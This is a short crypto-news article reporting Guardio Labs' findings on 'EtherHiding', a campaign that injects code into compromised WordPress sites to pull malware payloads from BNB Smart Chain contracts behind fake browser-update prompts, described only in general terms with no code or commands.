Hackers Exploit BNB Smart Chain Contracts to Spread Malware, Guardio Labs Warns
Summary:
Hackers are leveraging BNB Smart Chain (BSC) smart contracts to spread malware, as reported by Guardio Labs. The technique, known as 'EtherHiding', involves compromising WordPress websites to fetch payloads from blockchain contracts. The attackers use Binance smart contracts as anonymous platforms for hosting payloads. They adapt their attack methods, recently utilizing fake browser updates to distribute malware. Once the malicious contracts are deployed, they operate autonomously. Guardio highlights the need for adaptive defenses to counter these emerging cyber threats.
In a novel approach to spreading malicious software, hackers have found a way to abuse BNB Smart Chain (BSC) smart contracts. Guardio Labs, in their report dated October 15, revealed that these cybercriminals employ 'EtherHiding', a method that involves infecting WordPress websites by injecting code that fetches parts of the payload from blockchain contracts. Binance smart contracts are manipulated by these hackers to act as secure, anonymous platforms for hosting their payloads.
Hackers hold the power to alter the code and switch up their modes of attack. Recent attacks have manifested as fraudulent browser updates - victims are tricked into clicking on a fake update button on a bogus landing page, which then activates a payload loaded JavaScript that fetches additional code from the attacker's domain. This sequence of events ultimately leads to the entire site being plastered with misleading browser update notifications, delivering malware.
One of the key challenges with this method is its adaptability; threat actors can simply interchange the malicious code with each new blockchain transaction. Hence, mitigating such threats is arduous, according to Nati Tal, head of cybersecurity at Guardio Labs, and his colleague, security researcher Oleg Zaytsev.
Upon deployment, the corrupted smart contracts run independently, and all Binance can hope for is for the developer community to identify and report any malicious code within contracts.
Guardio has warned website owners, particularly those using WordPress - which powers about 43% of all websites - to tighten their security measures as WordPress sites are often compromised and act as an entry point for threats, allowing them to reach a wide array of potential victims.
Finally, the firm noted that the advent of Web3 and blockchain has opened up new avenues for malicious campaigns to operate undetected, necessitating the development of adaptive defenses to tackle such emerging threats.
Published At
10/16/2023 5:09:00 AM
Disclaimer: Algoine does not endorse any content or product on this page. Readers should conduct their own research before taking any actions related to the asset, company, or any information in this article and assume full responsibility for their decisions. This article should not be considered as investment advice. Our news is prepared with AI support.
Do you suspect this content may be misleading, incomplete, or inappropriate in any way, requiring modification or removal?
We appreciate your report.